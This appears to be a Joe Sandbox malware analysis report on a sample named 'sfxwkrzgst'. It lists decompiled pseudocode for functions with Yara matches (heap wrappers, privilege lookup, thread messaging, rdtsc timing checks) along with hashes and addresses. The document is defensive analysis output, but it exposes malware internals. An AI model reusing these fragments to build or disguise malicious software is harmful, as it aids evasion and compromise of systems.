                                  • API String ID: 2994545307-0
                                  • Opcode ID: 68e3a0e20c68bfbd84397b59c3e5a30894d4ef95e8ef9c9e6d93562bc5ed065d
                                  • Instruction ID: 6416d03a4c290f336cc19036eda2177b0d5af60ddf3e59f1fba5592eadc8c211
                                  • Opcode Fuzzy Hash: 68e3a0e20c68bfbd84397b59c3e5a30894d4ef95e8ef9c9e6d93562bc5ed065d
                                  • Instruction Fuzzy Hash: 3990026161100442414071B98844A068005BBE1251B52C135A1988550DC599886577A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a237a4cde8541203193197d24b36764eea9ecb46afff31616489597eb2f7b72a
                                  • Instruction ID: 27734de0bd7bdfb8b27431b1b6bcd7df09daac3ce22d5593f1000a2a1fc3bfb1
                                  • Opcode Fuzzy Hash: a237a4cde8541203193197d24b36764eea9ecb46afff31616489597eb2f7b72a
                                  • Instruction Fuzzy Hash: 7B90027121140802D10061A9481470B4005A7D0342F52C025A2154555DC665885176B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 77163a5ea995414cc6bc0cd8b01522b18d66d469e0bba5da2c138c28816c7ba6
                                  • Instruction ID: 26caa4eeea324f932e33ccae011f9ef87687f9de51144a7a88776ae685252da4
                                  • Opcode Fuzzy Hash: 77163a5ea995414cc6bc0cd8b01522b18d66d469e0bba5da2c138c28816c7ba6
                                  • Instruction Fuzzy Hash: 0F90026122180442D20065B94C14B074005A7D0343F52C129A1144554CC95588617661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9cf577e9b9cbd3eac78d55f2bf4365fcbe70bd7616082a684a7399d02be28bd0
                                  • Instruction ID: bdc7fbde4b6357963e75f9d6784f8a5066ea3880c168f7787a07839201009d8a
                                  • Opcode Fuzzy Hash: 9cf577e9b9cbd3eac78d55f2bf4365fcbe70bd7616082a684a7399d02be28bd0
                                  • Instruction Fuzzy Hash: DA900265221004030105A5A907046074046A7D5391752C035F2005550CD66188617261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9e7d555ebb53dbac0f9c43854229a4869a07a7c0adaf009d9afb4ac9b24a5647
                                  • Instruction ID: 4d8db79054d73ac3a593a1cab030d2e8d3024d026657a72d78a0335946e1fc6d
                                  • Opcode Fuzzy Hash: 9e7d555ebb53dbac0f9c43854229a4869a07a7c0adaf009d9afb4ac9b24a5647
                                  • Instruction Fuzzy Hash: 929002A121200403410571A94414716800AA7E0241F52C035E2004590DC56588917265
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 056eebd16758f7ddb97b80f4db5e53ea9b635763c4682faa873838c8ce01c923
                                  • Instruction ID: ef45edb81946f36033ff76347353cdf43bf2f38cae4af9224b9f01b259bbb04f
                                  • Opcode Fuzzy Hash: 056eebd16758f7ddb97b80f4db5e53ea9b635763c4682faa873838c8ce01c923
                                  • Instruction Fuzzy Hash: 6B90027121100802D10065E954087464005A7E0341F52D025A6014555EC6A588917271
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9d1af0314155f56cfd5f1c5f717f3fd85eb8226513e8fc27b5280bba667d4ca0
                                  • Instruction ID: 0aa5a3c556015053934d770f375cab8ecc16d1ccb2197cbd468a2781abdc8aac
                                  • Opcode Fuzzy Hash: 9d1af0314155f56cfd5f1c5f717f3fd85eb8226513e8fc27b5280bba667d4ca0
                                  • Instruction Fuzzy Hash: 2790026131100403D14071A954187068005F7E1341F52D025E1404554CD95588567362
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1ff5a21078cb680602f02be81dd35c6f0c431760b382c7a7313bb22b88b5f1a9
                                  • Instruction ID: 7038a967e49a2051c952b9b003898e6ba8ab28da7ae5ef5b7c6691158a0076d0
                                  • Opcode Fuzzy Hash: 1ff5a21078cb680602f02be81dd35c6f0c431760b382c7a7313bb22b88b5f1a9
                                  • Instruction Fuzzy Hash: C790026922300402D18071A9540870A4005A7D1242F92D429A1005558CC95588697361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8d5328fe8dfedaa409508e8103a160636ef89d1e1ad8f79ba249734a5947ad4f
                                  • Instruction ID: 15672e590cbbd9caeeb2b0a0dc089435d70de79e79da947d93a01ef90155fc19
                                  • Opcode Fuzzy Hash: 8d5328fe8dfedaa409508e8103a160636ef89d1e1ad8f79ba249734a5947ad4f
                                  • Instruction Fuzzy Hash: 7290027132114802D11061A984047064005A7D1241F52C425A1814558DC6D588917262
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cbeed84565a446b28133307e4fded6baa3ef5e6a6989fdb1e473eb846ea186ed
                                  • Instruction ID: 89e6769807be71310b4bb9f16521aa008a0b62989ac295bdb9093680d0fbff6b
                                  • Opcode Fuzzy Hash: cbeed84565a446b28133307e4fded6baa3ef5e6a6989fdb1e473eb846ea186ed
                                  • Instruction Fuzzy Hash: A290027121100C02D18071A9440474A4005A7D1341F92C029A1015654DCA558A5977E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 696a4ecc4f7f7b47fec7b1b40d142f840b6aa1d5352868de45f7bfc366fc17a0
                                  • Instruction ID: 43a116e9bdd6fcbf3509b25521a34434be1e15990cad787cb406e5e1f581f6eb
                                  • Opcode Fuzzy Hash: 696a4ecc4f7f7b47fec7b1b40d142f840b6aa1d5352868de45f7bfc366fc17a0
                                  • Instruction Fuzzy Hash: 3990027121108C02D11061A9840474A4005A7D0341F56C425A5414658DC6D588917261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004088D0 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E004088D0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0F0( &_v284, 0x104);
						E0041A760( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                  0x004088db
                                  0x004088e3
                                  0x004088e5
                                  0x004088ea
                                  0x004088ef
                                  0x00408902
                                  0x00408907
                                  0x00408910
                                  0x0040891c
                                  0x0040892f
                                  0x00408934
                                  0x00408937
                                  0x00408940
                                  0x00408952
                                  0x00408957
                                  0x0040895c
                                  0x00000000
                                  0x00000000
                                  0x0040895e
                                  0x00408962
                                  0x00000000
                                  0x00000000
                                  0x00408964
                                  0x00000000
                                  0x00408962
                                  0x00408966
                                  0x00408969
                                  0x0040896f
                                  0x00408971
                                  0x0040897c
                                  0x00408981
                                  0x00408984
                                  0x00408991
                                  0x0040899c
                                  0x0040899e
                                  0x004089a4
                                  0x004089a8
                                  0x004089ab
                                  0x004089ab
                                  0x004089b2
                                  0x004089b5
                                  0x004089ba
                                  0x004089c7
                                  0x004088f6
                                  0x004088f6
                                  0x004088f6

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                  • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                  • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                  • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004188B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 9 4188b0-4188e1 call 4191e0 RtlAllocateHeap
                                  C-Code - Quality: 100%
                                  			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                  0x004188c7
                                  0x004188d2
                                  0x004188dd
                                  0x004188e1

                                  APIs
                                  • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: 65A
                                  • API String ID: 1279760036-2085483392
                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407280 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 247 407280-4072ca call 41a140 call 41ad20 call 409b40 call 413e50 256 4072cc-4072de PostThreadMessageW 247->256 257 4072fe-407302 247->257 258 4072e0-4072fa call 4092a0 256->258 259 4072fd 256->259 258->259 259->257
                                  C-Code - Quality: 82%
                                  			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A140( &_v67, 0, 0x3f);
				E0041AD20( &_v68, 3);
				_t12 = E00409B40(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092A0(_t32, 1, 8, _t14) & 0x000000ff) - 0x40);
					}
					return _t14;
				}
				return _t13;
			}












                                  0x00407280
                                  0x0040728f
                                  0x00407293
                                  0x0040729e
                                  0x004072ae
                                  0x004072be
                                  0x004072c3
                                  0x004072ca
                                  0x004072cd
                                  0x004072da
                                  0x004072dc
                                  0x004072de
                                  0x004072fb
                                  0x004072fb
                                  0x00000000
                                  0x004072fd
                                  0x00407302

                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                  • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                  • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                  • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418A43 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 295 418a43-418a6f call 4191e0 298 418a72-418a84 LookupPrivilegeValueW 295->298
                                  C-Code - Quality: 64%
                                  			E00418A43(void* __eax, void* __edi, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a20) {
				int _t12;
				struct _LUID* _t15;

				_pop(ds);
				asm("adc byte [ebx-0x74aaa23b], 0xec");
				_t9 = _a8;
				E004191E0(__edi, _a8,  &(_a8[0x646]),  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
				_t15 = _a20;
				_t12 = LookupPrivilegeValueW(_a8, _a12, _t15); // executed
				return _t12;
			}





                                  0x00418a4a
                                  0x00418a4b
                                  0x00418a53
                                  0x00418a6a
                                  0x00418a6f
                                  0x00418a80
                                  0x00418a84

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: ae9698e84e4323be442f2f83e1ab73c2a960153ea6fc5f13f69c76e17f809523
                                  • Instruction ID: 60c75eee51255491854019ad401f11de2f602a18f1be5bf679ff97c2b48e5772
                                  • Opcode Fuzzy Hash: ae9698e84e4323be442f2f83e1ab73c2a960153ea6fc5f13f69c76e17f809523
                                  • Instruction Fuzzy Hash: 12E02B713002046BCB10DF54CC84FDB3758AF85260F044254F9485B681C634D901C7F4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004188F0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 299 4188f0-418906 300 41890c-418921 RtlFreeHeap 299->300 301 418907 call 4191e0 299->301 301->300
                                  C-Code - Quality: 100%
                                  			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                  0x004188ff
                                  0x00418907
                                  0x0041891d
                                  0x00418921

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418A50 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 302 418a50-418a69 303 418a6f-418a84 LookupPrivilegeValueW 302->303 304 418a6a call 4191e0 302->304 304->303
                                  C-Code - Quality: 100%
                                  			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				struct _LUID* _t13;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t13 = _a16;
				_t10 = LookupPrivilegeValueW(_a8, _a12, _t13); // executed
				return _t10;
			}






                                  0x00418a6a
                                  0x00418a6f
                                  0x00418a80
                                  0x00418a84

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004188EC Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E004188EC(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				asm("lds edi, [eax+edx*2-0x1374aa2a]");
				_t7 = _a4;
				_t3 = _t7 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                  0x004188ec
                                  0x004188f3
                                  0x004188ff
                                  0x00418907
                                  0x0041891d
                                  0x00418921

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: a376fa8f1b0c5b5529367328cf9c80c2e006efa77a539a1e6123e7ce98e9ecc5
                                  • Instruction ID: a58c7be9f91f7ac1209e609bae96ae711d935c9085237017060422d5dceac348
                                  • Opcode Fuzzy Hash: a376fa8f1b0c5b5529367328cf9c80c2e006efa77a539a1e6123e7ce98e9ecc5
                                  • Instruction Fuzzy Hash: F0E01AB6200215AFE718DF55CC48EE737A9EF88350F114599F9096B252C631E914CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418927 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00418927() {
				int _v0;
				intOrPtr _v4;
				void* _t15;

				asm("popfd");
				_t8 = _v4;
				E004191E0(_t15, _v4, _v4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
				ExitProcess(_v0);
			}






                                  0x0041892a
                                  0x00418933
                                  0x0041894a
                                  0x00418958

                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: 46291d7874e08f1f6064e0bae517bf70260e854c2b51cdc6473dca481346551d
                                  • Instruction ID: 4b88871481af6a000613f8035513a02a0bd105e18e87cbf091c97fafb534024b
                                  • Opcode Fuzzy Hash: 46291d7874e08f1f6064e0bae517bf70260e854c2b51cdc6473dca481346551d
                                  • Instruction Fuzzy Hash: 61E08C70600100BFD724DF29CC89FC33B6CDF49350F0181A8B9189B282C932AA00CAA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418930 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00418930(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                  0x00418933
                                  0x0041894a
                                  0x00418958

                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418A85 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00418A85(void* __eax, struct _LUID* __edx, void* __edi, void* __esi) {
				int _t7;
				void* _t16;

				_pop(_t16);
				_t7 = LookupPrivilegeValueW( *(_t16 + 0xc),  *(_t16 + 0x10), __edx); // executed
				return _t7;
			}





                                  0x00418a85
                                  0x00418a80
                                  0x00418a84

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                  Memory Dump Source
